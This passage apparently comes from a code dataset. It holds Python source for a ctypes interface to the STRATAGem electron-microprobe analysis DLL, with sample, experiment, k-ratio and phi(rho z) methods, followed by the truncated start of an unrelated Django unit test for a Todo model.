z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1000.0)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)\n self._lib.StSetScaleHV(maxhv_)\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n przs = {}\n for experiment, indexes in self._experiments.items():\n if maxdepth_m is None:\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1000.0\n for z, fraction in self._substrate[0].composition.items():\n dr = 0.0276 * atomic_mass_kg_mol(z\n ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *\n mass_density_kg_m3(z) / 1000.0)\n maxdepth_m += fraction / (dr * 1e-06)\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5\n increment_kg_m2 = maxdepth_m * self._substrate[0\n ].density_kg_m3 / bins\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n rzs = []\n ys_generated = []\n ys_emitted = []\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n return przs\n",
"step-5": "\"\"\"\nMain class of the interface.\nIt setups the experimental parameters such as the :class:`.Experiment`'s and\n:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of \n:math:`\\\\phi(\\\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and \nfluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).\n\"\"\"\n\n# Standard library modules.\nimport os\nimport ctypes as c\nimport logging\nlogger = logging.getLogger(__name__)\nfrom operator import attrgetter\nimport random\nimport string\nimport functools\n\ntry:\n import winreg\nexcept ImportError:\n try:\n import _winreg as winreg\n except ImportError:\n class winreg:\n\n HKEY_CURRENT_USER = None\n\n class _PyHKEY(object):\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n pass\n\n def OpenKey(self, key, sub_key, res, sam):\n return self._PyHKEY()\n\n def QueryValueEx(self, key, value_name):\n return None\n\n# Third party modules.\n\n# Local modules.\nfrom stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF\nfrom stratagemtools.experiment import Experiment, LINE_KA\nfrom stratagemtools.element_properties import \\\n atomic_mass_kg_mol, mass_density_kg_m3\n\n# Globals and constants variables.\n_REGISTRY_KEY = \"Software\\SAMx\\Stratagem\\Configuration\"\n_REGISTRY_VALUENAME = 'InstallOEMDirectory'\n\nPRZMODE_XPP = 0\n\"\"\":math:`\\\\phi(\\\\rho z)` from XPP\"\"\"\n\nPRZMODE_PAP = 1\n\"\"\":math:`\\\\phi(\\\\rho z)` from PAP\"\"\"\n\nPRZMODE_GAU = 2\n\"\"\":math:`\\\\phi(\\\\rho z)` *unknown*, possibly two Gaussians\"\"\"\n\nFLUORESCENCE_NONE = 0\n\"\"\"No fluorescence\"\"\"\n\nFLUORESCENCE_LINE = 1\n\"\"\"Only characteristic fluorescence\"\"\"\n\nFLUORESCENCE_LINE_CONT = 2\n\"\"\"Characteristic and Bremsstrahlung fluorescence\"\"\"\n\n_CONCENTRATION_FLAG_KNOWN = 0\n_CONCENTRATION_FLAG_UNKNOWN = 1\n_CONCENTRATION_FLAG_STOICHIOMETRIC = 2\n_CONCENTRATION_FLAG_TRACE = 3\n_CONCENTRATION_FLAG_DIFFERENCE = 4\n\nclass StratagemError(Exception):\n \"\"\"\n Exception raised for all errors related to the STRATAGem interface.\n \"\"\"\n pass\n\ndef _check_key(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n if self._key is None:\n raise StratagemError('Not initialize. Call init().')\n return method(self, *args, **kwargs)\n return wrapper\n\nclass Stratagem:\n \"\"\"\n Main interface establishing a connection to the STRATAGem OEM interface and\n perform calculations using SAMx's STRATAGem.\n It is highly recommended to use :class:`Stratagem` as a context manager \n (i.e. ``with`` statement) to ensure that the connection to the DLL is \n properly closed.\n For instance::\n \n >>> with Stratagem() as strata:\n ... strata.prz_mode = PRZMODE_XPP\n \n Otherwise the following series of method must be called::\n \n >>> strata = Stratagem()\n >>> strata.init()\n >>> strata.prz_mode = PRZMODE_XPP\n >>> strata.close()\n \"\"\"\n\n def __init__(self, dll_path=None, display_error=True):\n \"\"\"\n :arg dll_path: complete path to the location of ``stratadllogger.dll``\n (optional). If ``None``, the path is found in the Windows registry\n under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not\n found a :class:`StratagemError` is raised.\n :type dll_path: :class:`str`\n \n :arg display_error: whether to display a message dialog on error\n :type display_error: :class:`bool`\n \"\"\"\n if dll_path is None:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable\n basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable\n dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')\n\n cwd = os.getcwd()\n try:\n logger.debug(\"dll=%s\", dll_path)\n self._lib = c.WinDLL(dll_path)\n finally:\n os.chdir(cwd) # Change back to real cwd\n\n logger.debug(\"StEnableErrorDisplay(%r)\", display_error)\n self._lib.StEnableErrorDisplay(c.c_bool(display_error))\n\n self._key = None\n self._cwd = os.getcwd()\n self._layers = {} # layer: index\n self._substrate = None\n self._experiments = {} # experiment: (element, line, kratio) indexes\n self._tmpstandards = []\n\n def __enter__(self):\n self.init()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n return False\n\n def _stobjectnew(self, key=None, standard=False):\n if key is None:\n characters = string.ascii_lowercase\n key = ''.join(random.choice(characters) for _ in range(8))\n key = key.encode('ascii')\n if not isinstance(key, c.c_byte):\n key = c.create_string_buffer(key)\n\n bnormal_ = c.c_bool(not standard)\n iniflags_ = c.c_int(0)\n\n logger.debug(\"StObjectNew(key, %r, %i)\", not standard, 0)\n if not self._lib.StObjectNew(key, bnormal_, iniflags_):\n self._raise_error(\"Cannot create object\")\n\n return key\n\n def _raise_error(self, alternate=''):\n \"\"\"\n Raises a :class:`StratagemError`. \n The error code and message of known errors are retrieved from STRATAGem. \n If this is not possible, *alternate* is used as the error message.\n \"\"\"\n errnum_ = c.c_ulong()\n errtype_ = c.c_int()\n\n self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))\n\n if errnum_.value != 0:\n if errtype_.value == 0:\n buf_ = c.create_string_buffer(256)\n self._lib.StGetMsg(errnum_, buf_, 256)\n raise StratagemError(buf_.value.decode('ascii'))\n elif errtype_.value == 1:\n raise c.WinError(errtype_.value)\n else:\n raise StratagemError('Error %i' % errnum_.value)\n else:\n raise StratagemError(alternate)\n\n def init(self):\n \"\"\"\n Initializes and setups STRATAGem.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n raise RuntimeError('Already initialized. Call close() first.')\n\n self._key = self._stobjectnew()\n self._cwd = os.getcwd()\n self.reset()\n\n def close(self):\n \"\"\"\n Closes the connection to the STRATAGem DLL.\n It does not have to be used if :class:`Stratagem` is used as a context\n manager.\n \"\"\"\n if self._key is not None:\n logger.debug('StObjectDelete(key)')\n self._lib.StObjectDelete(self._key)\n self._key = None\n\n for filepath in self._tmpstandards:\n os.remove(filepath)\n logger.debug('Remove temporary standard: %s', filepath)\n\n self.reset()\n\n def reset(self):\n \"\"\"\n Resets all parameters to the defaults, remove all experiments and sample.\n \"\"\"\n if self._key:\n self._lib.StObjectReset(self._key)\n os.chdir(self._cwd)\n self._layers.clear() # layer: index\n self._substrate = None\n self._experiments.clear() # analyzed experiments\n self._tmpstandards.clear()\n\n @_check_key\n def set_sample(self, sample):\n \"\"\"\n Sets the sample, which will be used in all subsequent calculations.\n Note that only one sample can be defined.\n \n :arg sample: sample definition\n :type sample: :class:`Sample`\n \"\"\"\n self.reset()\n\n for layer in sample.layers:\n index = self._add_layer(layer, substrate=False)\n self._layers.setdefault(layer, index)\n\n index = self._add_layer(sample.substrate, substrate=True)\n self._substrate = (sample.substrate, index)\n\n @_check_key\n def get_sample(self):\n \"\"\"\n Returns the current sample. \n It can correspond to the sample defined by :meth:`set_sample` or the\n sample resulting from the computations (see :meth:`compute`).\n \n .. note:: a new sample is returned every time this method is called\n \n :return: current sample\n :rtype: :class:`Sample`\n \"\"\"\n sample = Sample(self._substrate[0].composition)\n\n for layer in self._layers:\n sample.add_layer(layer.composition, layer.thickness_m,\n layer.mass_thickness_kg_m2, layer.density_kg_m3)\n\n return sample\n\n sample = property(get_sample, set_sample, doc=\"Property to set/get sample\")\n\n def _add_layer(self, layer, substrate=False, key=None):\n \"\"\"\n Internal method to add a layer from top to bottom. \n The last layer added is considered as the substrate.\n \n :arg layer: layer\n :type layer: :class:`.Layer`\n \n :return: index of the layer\n \"\"\"\n if key is None:\n key = self._key\n\n logger.debug(\"StSdAddLayer(key)\")\n ilayer_ = self._lib.StSdGetNbLayers(key)\n\n logger.debug(\"StSdAddLayer(key, %i)\", ilayer_)\n if not self._lib.StSdAddLayer(key, ilayer_):\n self._raise_error(\"Cannot add layer\")\n\n for i, value in enumerate(layer.composition.items()):\n ielt_ = c.c_int(i)\n logger.debug(\"StSdAddElt(key, %i, %i)\", ilayer_, i)\n if not self._lib.StSdAddElt(key, ilayer_, ielt_):\n self._raise_error(\"Cannot add element\")\n\n z, wf = value\n nra_ = c.c_int(z)\n logger.debug(\"StSdSetNrAtom(key, %i, %i, %i)\", ilayer_, i, z)\n if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):\n self._raise_error(\"Cannot set atomic number\")\n\n if wf is None or wf == CONC_UNKNOWN:\n flag = _CONCENTRATION_FLAG_UNKNOWN\n elif wf == CONC_DIFF:\n flag = _CONCENTRATION_FLAG_DIFFERENCE\n else:\n flag = _CONCENTRATION_FLAG_KNOWN\n\n wf_ = c.c_double(wf)\n logger.debug(\"StSdSetConc(key, %i, %i, %f)\", ilayer_, i, wf)\n if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):\n self._raise_error(\"Cannot set concentration\")\n\n logger.debug(\"StSdSetConcFlag(key, %i, %i, %i)\", ilayer_, i, flag)\n if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):\n self._raise_error(\"Cannot set concentration flag\")\n\n if not substrate:\n thick_known = layer.is_thickness_known()\n thick_known_ = c.c_bool(thick_known)\n\n if layer.is_density_known():\n density = layer.density_kg_m3 / 1e3 # g/cm3\n else:\n density = 10.0\n density_ = c.c_double(density)\n\n if thick_known:\n thickness = layer.thickness_m * 1e10 # Angstroms\n mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2\n else:\n thickness = 0.0\n mass_thickness = 0.0\n thickness_ = c.c_double(thickness)\n mass_thickness_ = c.c_double(mass_thickness)\n\n logger.debug(\"StSdSetThick(key, %i, %r, %d, %d, %d)\", ilayer_,\n thick_known, mass_thickness, thickness, density)\n if not self._lib.StSdSetThick(key, ilayer_, thick_known_,\n mass_thickness_, thickness_, density_):\n self._raise_error(\"Cannot set thickness\")\n\n return int(ilayer_)\n\n def _create_standard(self, standard):\n \"\"\"\n Internal method to create a new object defining the standard \n :class:`.Sample`.\n \"\"\"\n # Create new object\n key_ = self._stobjectnew(standard=True)\n\n # Set sample\n for layer in standard.layers:\n self._add_layer(layer, substrate=False, key=key_)\n self._add_layer(standard.substrate, substrate=True, key=key_)\n\n # Save\n filename = key_.value.decode('ascii') + '.tfs'\n filepath = os.path.join(self.get_standard_directory(), filename)\n\n filepath_ = c.create_string_buffer(filepath.encode('ascii'))\n logger.debug('StObjectWriteFile(key, %s)', filepath)\n if not self._lib.StObjectWriteFile(key_, filepath_):\n self._raise_error(\"Cannot save standard\")\n\n # Delete object\n self._lib.StObjectDelete(key_)\n\n self._tmpstandards.append(filepath)\n\n return filepath\n\n @_check_key\n def add_experiment(self, experiment):\n \"\"\"\n Adds an experiment, i.e. measurements of k-ratio at different energies.\n \n .. hint:: Use :meth:`reset` method to remove defined experiments.\n \n :arg experiment: experiment\n :type experiment: :class:`Experiment`\n \"\"\"\n nra_ = c.c_int(experiment.z)\n klm_ = c.c_int(experiment.line)\n hv_ = c.c_double(experiment.energy_eV / 1e3)\n ielt_ = c.c_int()\n iline_ = c.c_int()\n iexpk_ = c.c_int()\n logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)\n if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,\n c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):\n self._raise_error(\"Cannot add atomic number and line\")\n\n standard = experiment.standard\n if isinstance(standard, Sample):\n standard = self._create_standard(standard)\n standard_ = c.create_string_buffer(standard.encode('ascii'))\n logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)\n if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):\n self._raise_error(\"Cannot set standard\")\n\n analyzed = experiment.is_analyzed()\n analyzed_ = c.c_bool(analyzed)\n logger.debug(\"StEdSetAnalyzedFlag(key, %i, %r)\", ielt_.value, analyzed)\n if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):\n self._raise_error(\"Cannot add experiment analyzed flag\")\n\n kratio_ = c.c_double(experiment.kratio)\n logger.debug(\"StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)\",\n ielt_.value, iline_.value, iexpk_.value,\n experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,\n experiment.kratio)\n if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,\n hv_, hv_, kratio_, c.c_double(0.0),\n c.c_int(2)):\n self._raise_error(\"Cannot set experiment k-ratio\")\n\n if experiment.is_analyzed():\n indexes = (ielt_.value, iline_.value, iexpk_.value)\n self._experiments.setdefault(experiment, indexes)\n\n @_check_key\n def add_experiments(self, *exps):\n \"\"\"\n Adds several experiments::\n \n >>> strata.add_experiments(exp1, exp2, exp3)\n \"\"\"\n for exp in exps:\n self.add_experiment(exp)\n\n def get_experiments(self):\n \"\"\"\n Returns a :class:`tuple` of all defined experiments.\n \n :rtype: :class:`tuple`\n \"\"\"\n return tuple(self._experiments.keys())\n\n @_check_key\n def set_geometry(self, toa, tilt, azimuth):\n \"\"\"\n Sets the geometry.\n \n :arg toa: take off angle (in radians)\n :arg tilt: tilt angle (in radians)\n :arg azimuth: azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double(toa)\n tilt_ = c.c_double(tilt)\n azimuth_ = c.c_double(azimuth)\n logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)\n if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):\n self._raise_error(\"Cannot set geometry parameters\")\n\n @_check_key\n def get_geometry(self):\n \"\"\"\n Returns the geometry.\n \n :return: take off angle (in radians), tilt angle (in radians),\n azimuthal angle (in radians)\n \"\"\"\n toa_ = c.c_double()\n tilt_ = c.c_double()\n azimuth_ = c.c_double()\n logger.debug('StGetGeomParams(key)')\n if not self._lib.StGetGeomParams(self._key, c.byref(toa_),\n c.byref(tilt_), c.byref(azimuth_)):\n self._raise_error(\"Cannot get geometry parameters\")\n\n return toa_.value, tilt_.value, azimuth_.value\n\n geometry = property(get_geometry, doc='Property to get geometry')\n\n @_check_key\n def set_prz_mode(self, mode):\n \"\"\"\n Sets the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :arg mode: type of model, either\n \n * :data:`PRZMODE_XPP`\n * :data:`PRZMODE_PAP`\n * :data:`PRZMODE_GAU`\n :type mode: :class:`int`\n \"\"\"\n mode_ = c.c_int(mode)\n logger.debug('StSetPrzMode(%i)', mode)\n self._lib.StSetPrzMode(mode_)\n\n @_check_key\n def get_prz_mode(self):\n \"\"\"\n Returns the type of model to use for the :math:`\\\\phi(\\\\rho z)`.\n \n :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or \n :data:`PRZMODE_GAU`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetPrzMode()\n\n prz_mode = property(get_prz_mode, set_prz_mode,\n doc='Property to get/set prz mode')\n\n @_check_key\n def set_fluorescence(self, flag):\n \"\"\"\n Sets the fluorescence flag.\n \n :arg flag: either \n \n * :data:`FLUORESCENCE_NONE`\n * :data:`FLUORESCENCE_LINE`\n * :data:`FLUORESCENCE_LINE_CONT`\n :type flag: :class:`int`\n \"\"\"\n flag_ = c.c_int(flag)\n logger.debug('StSetFluorFlg(%i)', flag)\n self._lib.StSetFluorFlg(flag_)\n\n @_check_key\n def get_fluorescence(self):\n \"\"\"\n Returns the fluorescence flag.\n \n :return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`\n or :data:`FLUORESCENCE_LINE_CONT`\n :rtype: :class:`int`\n \"\"\"\n return self._lib.StGetFluorFlg()\n\n fluorescence = property(get_fluorescence, set_fluorescence,\n doc='Property to get/set fluorescence')\n\n @_check_key\n def set_standard_directory(self, dirpath):\n \"\"\"\n Sets the directory where standard files are stored.\n \n :arg dirpath: path to directory\n :type dirpath: :class:`str`\n \"\"\"\n dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))\n self._lib.StSetDirectory(c.c_int(1), dirpath_)\n\n @_check_key\n def get_standard_directory(self):\n \"\"\"\n Returns the directory where standard files are stored.\n \n :rtype: :class:`str`\n \"\"\"\n dirpath = (c.c_char * 256)()\n self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)\n return dirpath.value.decode('ascii')\n\n standard_directory = property(get_standard_directory, set_standard_directory,\n doc='Property to get/set standard directory')\n\n @_check_key\n def compute_kratio_vs_thickness(self, layer,\n thickness_low_m, thickness_high_m, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the thickness \n for a layer.\n \n :arg layer: layer of a sample (must have been previously added)\n :type layer: :class:`.Layer`\n \n :arg thickness_low_m: lower limit of the thickness in meters\n :type thickness_low_m: :class:`float`\n \n :arg thickness_high_m: upper limit of the thickness in meters\n :type thickness_high_m: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of thicknesses\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each thickness\n \"\"\"\n logger.debug('StSetKvsThicknessUnit(2)')\n self._lib.StSetKvsThicknessUnit(2) # unit in nm\n\n if layer not in self._layers:\n raise ValueError(\"Unknown layer\")\n ilayer = self._layers[layer]\n ilayer_ = c.c_int(ilayer)\n\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n # Compute\n low_ = c.c_double(thickness_low_m * 1e9)\n high_ = c.c_double(thickness_high_m * 1e9)\n logger.debug('StComputeKvsThickness(key, %i, %f, %f)',\n ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)\n if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):\n self._raise_error(\"Cannot compute k-ratio vs thickness\")\n\n # Fetch results\n thicknesses = []\n kratios = {}\n\n thick_ = c.c_double()\n k_ = c.c_double()\n for i in range(step + 1):\n i_ = c.c_int(i)\n\n if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):\n self._raise_error(\"Cannot get thickness\")\n thicknesses.append(thick_.value)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n iHv_ = c.c_int(indexes[2])\n\n if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,\n iHv_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n kratios.setdefault(experiment, []).append(k_.value)\n\n return thicknesses, kratios\n\n @_check_key\n def compute_kratio_vs_energy(self, energy_high_eV, step):\n \"\"\"\n Computes the variation of the k-ratio as a function of the incident\n energy. \n Note that the computation also starts at 0 keV up to the specified energy.\n \n :arg energy_high_eV: upper limit of the thickness in electronvolts\n :type energy_high_eV: :class:`float`\n \n :arg step: number of steps\n :type step: :class:`int`\n \n :return: :class:`tuple` containing\n \n * :class:`list` of energies in electronvolts\n * :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are :class:`list` \n containing k-ratios for each energy\n \"\"\"\n step_ = c.c_int(step)\n logger.debug('StSetNbComputedHV(%i)', step)\n self._lib.StSetNbComputedHV(step_)\n\n energy_ = c.c_double(energy_high_eV / 1e3)\n logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))\n self._lib.StSetMaxHV(energy_)\n\n # Compute\n logger.debug('StComputeKvsHV(key)')\n if not self._lib.StComputeKvsHV(self._key):\n self._raise_error(\"Cannot compute k-ratio vs energy\")\n\n # Fetch results\n energies = []\n kratios = {}\n\n k_ = c.c_double()\n bHV_ = c.c_bool(True)\n increment = float(energy_high_eV / 1e3) / step\n\n for i in range(step + 1):\n hv = i * increment\n hv_ = c.c_double(hv)\n\n for experiment, indexes in self._experiments.items():\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n\n if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):\n self._raise_error(\"Cannot get k-ratio\")\n\n kratios.setdefault(experiment, []).append(k_.value)\n\n energies.append(hv)\n\n return energies, kratios\n\n @_check_key\n def compute_kratios(self):\n \"\"\"\n Computes the k-ratios of the different experiments.\n \n :return: :class:`dict` where the keys are experiments (as defined by\n :meth:`.add_experiment`) and the values are k-ratios \n (:class:`float`).\n \"\"\"\n if len(self._layers) == 0:\n return self._compute_kratios_substrate()\n else:\n return self._compute_kratios_multilayers()\n\n @_check_key\n def _compute_kratios_multilayers(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_thickness`.\n \"\"\"\n for i, layer in enumerate(self._layers.keys()):\n if not layer.is_thickness_known():\n raise ValueError(\"Thickness of layer %i is unknown\" % i)\n\n # Compute\n layer = list(self._layers.keys())[0]\n thickness_low_m = layer.thickness_m\n thickness_high_m = layer.thickness_m * 10\n step = 1\n\n _thicknesses, kratios = \\\n self.compute_kratio_vs_thickness(layer, thickness_low_m,\n thickness_high_m, step)\n\n # Reorganize results\n output = {}\n for experiment, kratio in kratios.items():\n output.setdefault(experiment, kratio[0])\n\n return output\n\n @_check_key\n def _compute_kratios_substrate(self):\n \"\"\"\n Internal method to compute the k-ratios using the \n :meth:`compute_kratio_vs_energy`.\n \"\"\"\n output = {}\n\n step = 2\n for experiment in self._experiments:\n energy_high_eV = experiment.energy_eV\n\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV, step)\n\n kratio = kratios[experiment][-1]\n if (kratio < 0): # Bug in strategem that some energy don't work\n logger.warn(\"STRATAGem returns a negative k-ratio, re-try with energy + 1 eV\")\n _energies, kratios = \\\n self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)\n kratio = kratios[experiment][-1]\n\n output.setdefault(experiment, kratio)\n\n return output\n\n @_check_key\n def compute(self, iteration_max=50):\n \"\"\"\n Computes the unknown composition(s) and thickness(es) in the specified\n sample.\n \n :arg iteration_max: maximum number of iterations of the solve\n (default: 50)\n :type iteration_max: :class:`int`\n \n :return: calculated sample\n :rtype: :class:`.Sample`\n \"\"\"\n # Add missing experiments\n zs = set(exp.z for exp in self._experiments.keys())\n\n for layer in list(self._layers.keys()) + [self._substrate[0]]:\n for z, wf in layer.composition.items():\n if z in zs:\n continue\n if wf is None:\n continue\n logger.debug('Added dummy experiment for z=%i', z)\n exp = Experiment(z, LINE_KA, 0.0, analyzed=False) # dummy\n self.add_experiment(exp)\n\n # Set iteration maximum\n iteration_max_ = c.c_int(iteration_max)\n logger.debug('StSetMaxNbIter(%i)', iteration_max)\n self._lib.StSetMaxNbIter(iteration_max_)\n\n # Compute\n logger.debug('StComputeIterpStart(key)')\n if not self._lib.StComputeIterpStart(self._key):\n self._raise_error(\"Cannot start iteration\")\n\n continue_ = c.c_bool(True)\n iteration = 0\n\n logger.debug('Start iteration')\n while True:\n iteration += 1\n logger.debug('Iteration #%i' % iteration)\n\n logger.debug('StComputeIterpNext(key, %r)' % continue_.value)\n if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):\n break\n\n if not continue_.value:\n break\n\n logger.debug('Iteration completed')\n\n # Fetch results\n thick_known = c.c_bool()\n mass_thickness = c.c_double()\n thickness = c.c_double()\n density = c.c_double()\n\n def get_layer(layer, ilayer):\n ilayer_ = c.c_int(ilayer)\n\n logger.debug('StSdGetNbElts(key, %i)' % ilayer)\n nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)\n if nbelt == -1:\n self._raise_error(\"Cannot get number of elements\")\n\n flag_ = (c.c_int * nbelt)()\n wfs_ = (c.c_double * nbelt)()\n logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)\n if not self._lib.StSdGetLayRawConcs(self._key, ilayer_,\n flag_, wfs_):\n self._raise_error(\"Cannot get layer concentration\")\n\n composition = {}\n for z in layer.composition.keys():\n nra_ = c.c_int(z)\n logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))\n zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)\n composition[z] = wfs_[zindex]\n\n logger.debug(\"StSdGetThick(key, %i)\", ilayer)\n if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(thick_known),\n c.byref(mass_thickness), c.byref(thickness),\n c.byref(density)):\n self._raise_error(\"Cannot get thickness\")\n\n return (composition, thickness.value / 1e10,\n mass_thickness.value * 10.0, density.value * 1e3)\n\n sample = Sample(get_layer(*self._substrate)[0])\n\n for layer, ilayer in self._layers.items():\n sample.add_layer(*get_layer(layer, ilayer))\n\n return sample\n\n @_check_key\n def compute_prz(self, maxdepth_m=None, bins=100):\n \"\"\"\n Compute :math:`\\\\phi(\\\\rho z)` of all experiments.\n \n .. warning:: Only available for substrate (no layers).\n \n :arg maxdepth_m: maximum depth of the :math:`\\\\phi(\\\\rho z)` \n distribution in meters. If ``None``, Kanaya-Okayama electron range\n is used with a safety factor of 1.5.\n :type maxdepth_m: :class:`float`\n \n :arg bins: number of bins in the :math:`\\\\phi(\\\\rho z)` distribution\n :type bins: :class:`int`\n \n :return: a :class:`dict` where the keys are the experiments and the \n values are a tuple containing three lists:\n \n * :math:`\\\\rho z` coordinates (in g/cm2)\n * generated intensities of :math:`\\\\phi(\\\\rho z)` (no absorption)\n * emitted intensites of :math:`\\\\phi(\\\\rho z)`\n \"\"\"\n if len(self._layers) > 0:\n raise RuntimeError('PRZ can only be computed for substrate')\n\n # Set scaling\n hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())\n maxhv_eV = max(hvs_eV)\n maxhv_ = c.c_double(maxhv_eV / 1e3)\n logger.debug('StSetScaleHV(%s)', maxhv_eV / 1e3)\n self._lib.StSetScaleHV(maxhv_)\n\n # Compute\n logger.debug('StComputePrz(key)')\n if not self._lib.StComputePrz(self._key):\n self._raise_error('Cannot compute prz')\n\n # Get values\n przs = {}\n\n for experiment, indexes in self._experiments.items():\n # Size of each bin\n if maxdepth_m is None:\n # Calculate max depth using Kanaya-Okayama\n maxdepth_m = 0.0\n energy_keV = experiment.energy_eV / 1e3\n\n for z, fraction in self._substrate[0].composition.items():\n dr = (0.0276 * atomic_mass_kg_mol(z) * 1e3 * energy_keV ** 1.67) / \\\n (z ** 0.89 * mass_density_kg_m3(z) / 1e3)\n maxdepth_m += fraction / (dr * 1e-6)\n\n maxdepth_m = 1.0 / maxdepth_m\n maxdepth_m *= 1.5 # safety factor\n\n increment_kg_m2 = (maxdepth_m * self._substrate[0].density_kg_m3) / bins\n\n # Indexes\n ielt_ = c.c_int(indexes[0])\n iline_ = c.c_int(indexes[1])\n ihv_ = c.c_int(0)\n\n rzs = []\n ys_generated = []\n ys_emitted = []\n\n for i in range(bins):\n rz_ = c.c_double(i * increment_kg_m2 * 0.1)\n rzs.append(i * increment_kg_m2)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(True)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_emitted.append(y_.value)\n\n y_ = c.c_double()\n bUseExp_ = c.c_bool(False)\n self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,\n bUseExp_, c.byref(y_))\n ys_generated.append(y_.value)\n\n przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))\n\n return przs\n\n",
"step-ids": [
21,
23,
38,
39,
40
]
}
|
[
21,
23,
38,
39,
40
] |
# -*- coding: utf-8 -*-
from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user', password='somepasswd')
